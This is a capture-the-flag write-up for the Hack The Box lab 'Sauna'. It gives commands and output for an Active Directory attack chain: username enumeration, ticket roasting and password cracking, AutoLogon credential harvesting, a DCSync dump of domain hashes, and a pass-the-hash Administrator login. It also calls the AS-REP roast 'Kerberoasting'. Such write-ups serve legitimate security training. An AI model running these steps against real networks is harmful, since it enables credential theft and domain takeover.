[HTB] Sauna WriteUp
Sauna is an easy Windows machine on Hack The box. A user is Kerberoastable which leads to a second user, then a DCSync attack leads to administrator.
Begin with an nmap scan.
nmap -sV -sC -oN nmap/nmap 10.10.10.175
# Nmap 7.80 scan initiated Mon May 18 20:41:01 2020 as: nmap -sV -sC -oN nmap/nmap 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.078s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-19 03:45:31Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=5/18%Time=5EC2E4E6%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 18 20:45:47 2020 -- 1 IP address (1 host up) scanned in 285.85 seconds
A number of ports are open, I start with the website running on port 80.
Not much can be found on the website. The about page lists members of the team, we can use this to generate usernames.
I also ran ldapsearch against the machine, this reveals a user Hugo Smith, this turned out to be a rabbit hole, the real user we will need to go after is Fergus Smith.
ldapsearch -h 10.10.10.175 -p 389 -x -b 'dc=EGOTISTICAL-BANK,dc=local' > ldapsearch.txt
We can use Kerbrute to find valid usernames based on the names on the website. First I create a text file with some common username formats, then run Kerbrute.
./kerbrute userenum --dc 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL usernames.txt
[+] VALID USERNAME: administrator@EGOTISTICAL-BANK.LOCAL
[+] VALID USERNAME: FSmith@EGOTISTICAL-BANK.LOCAL
Kerbrute identifies administrator and FSmith. This user is kerberoastable, we can use the impacket script GetUserSPNs.py to get the TGT for FSmith.
$ python ./GetUserSPNs.py -dc-ip 10.10.10.175 -no-pass -k EGOTISTICAL-BANK.LOCAL/FSMITH
[*] Getting TGT for FSMITH
$krb5asrep$23$FSMITH@EGOTISTICAL-BANK.LOCAL:237e94674c738dc86e2b8033c54e259b$5f3de4694b4138fa0335eef7c60ccd8fa663e0be911497efcb80dcc211eaedebedfc1cc6aca1fa84b84a8968362093f3960128ba0dcae936c28bc9d674336f9556a8feb660103e5f0433e14ad0aa2552f57e7b65dc17a1447c51ddf9bf7535a0839184369058eed40ff444c15eee023abaa02581bc998025c7906f92d1599707a4d2b17a4f645716d961ae6a2ab6fdb0a027399b5756ea0394f8168a352a1fad39f61977581319b20078c5cea9f8333b4a1aedfe27b729299b429daec7c056e406ab0cff24f424c7b5f79baf702eedbe9dc164bc443b13d2671549510b25cc572b6def1fe10b152c74b42f324b2193d16e58c88ba8902a56d74182975a5f4e9b
We can then use john to crack the hash.
john FSMITHhash --fork=4 -w=/usr/share/wordlists/rockyou.txt
We get The password Thestrokes23
.
Now we can use Evil-winrm to log into the box.
evil-winrm -i 10.10.10.175 -u FSMITH -p Thestrokes23
C:\users\fsmith\desktop\user.txt
Privilege Escalation
Running winPEAS identifies a user svc_loanmanager which has autologon enabled and a default password.
[+] Looking for AutoLogon credentials(T1012)
Some AutoLogon credentials were found!!
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
We can open a new remote session as svc_loanmgr. (Under C:\users\ we see that the user logs in as svc_loanmgr not svc_loanmanager)
evil-winrm -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround!
We can now use Bloodhound to find potential paths to Domain Admin.
bloodhound-python -u svc_loanmgr -p Moneymakestheworldgoround! -d EGOTISTICAL-BANK.LOCAL -ns 10.10.10.175 -c All
Looking through the bloodhound results we find that the svc-loanmgr user can leak password hashes from the Domain controller using a DCSync attack. This is done by impersonating a new Domain Controller and requesting synchronisation with the existing DC.
We can use another Impacket script to perform this attack.
$ secretsdump.py egotisticalbank/svc_loanmgr@10.10.10.175
Impacket v0.9.22.dev1+20200518.92028.525fa3d0 - Copyright 2020 SecureAuth Corporation
Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:ec048b4c6a47762bb522a7a4d302670b:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:d1fb5eefd5831287eb278c5eb24ef19dee6f40aa3917ea8581762066ba88ac3b
SAUNA$:aes128-cts-hmac-sha1-96:f6e1682022cd138a00262c4910a7944b
SAUNA$:des-cbc-md5:46b0434967132c4f
[*] Cleaning up...
We can now use evil-winrm to pass the hash and login as Administrator.
evil-winrm -i 10.10.10.175 -u administrator -H :d9485863c1e9e05851aa40cbb4ab9dff
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
C:\users\administrator\desktop\root.txt